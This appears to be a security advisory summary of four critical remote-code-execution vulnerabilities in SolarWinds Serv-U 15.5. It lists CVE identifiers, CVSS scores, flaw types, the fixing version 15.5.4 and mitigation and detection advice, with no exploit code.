Full Report
SolarWinds has released updates to address four critical security flaws in its Serv-U file transfer software that, if successfully exploited, could result in remote code execution. The vulnerabilities, all rated 9.1 on the CVSS scoring system, are listed below - CVE-2025-40538 - A broken access control vulnerability that allows an attacker to create a system admin user and execute arbitrary
Analysis Summary
# Vulnerability: Four Critical RCE Vulnerabilities in SolarWinds Serv-U
## CVE Details
- CVE ID: CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, CVE-2025-40541
- CVSS Score: 9.1 (Critical)
- CWE: Broken Access Control (CWE for CVE-2025-40538), Type Confusion, IDOR (Inferred from descriptions)
## Affected Systems
- Products: SolarWinds Serv-U file transfer software
- Versions: Version 15.5
- Configurations: Exploitation requires administrative privileges; however, SolarWinds notes exploitation risk is medium on Windows deployments as services often run under less-privileged accounts by default.
## Vulnerability Description
Four separate critical vulnerabilities exist in SolarWinds Serv-U:
1. **CVE-2025-40538 (Broken Access Control):** Allows an attacker to create a system administrator user, leading to arbitrary code execution as root by leveraging domain admin or group admin privileges.
2. **CVE-2025-40539 & CVE-2025-40540 (Type Confusion):** Two distinct type confusion flaws that permit an attacker to execute arbitrary native code as root.
3. **CVE-2025-40541 (Insecure Direct Object Reference - IDOR):** An IDOR vulnerability that allows an attacker to execute native code as root.
## Exploitation
- Status: Not exploited in the wild (per vendor advisory), but prior Serv-U flaws have been exploited historically.
- Complexity: Requires administrative privileges for successful exploitation.
- Attack Vector: Likely Network (Remote exploitation possible given the general nature of Serv-U flaws).
## Impact
- Confidentiality: Potentially High (Root code execution allows full system compromise)
- Integrity: Potentially High (Arbitrary code execution as root)
- Availability: Potentially High (Arbitrary code execution as root)
## Remediation
### Patches
- **SolarWinds Serv-U version 15.5.4** addresses all four vulnerabilities.
### Workarounds
- No specific workarounds were detailed in the provided context, but given the requirement for administrative privileges, reducing the privileges of the Serv-U service account is a strong mitigation factor.
## Detection
- Detection methods were not explicitly provided, but monitoring for unexpected creation of administrative accounts or unusual process execution originating from the Serv-U service is recommended.
## References
- Vendor Advisory (CVE-2025-40538): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40538
- Vendor Advisory (CVE-2025-40539): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40539
- Vendor Advisory (CVE-2025-40540): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40540
- Vendor Advisory (CVE-2025-40541): hxxps://www.solarwinds.com/trust-center/security-advisories/cve-2025-40541
- Release Notes: hxxps://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm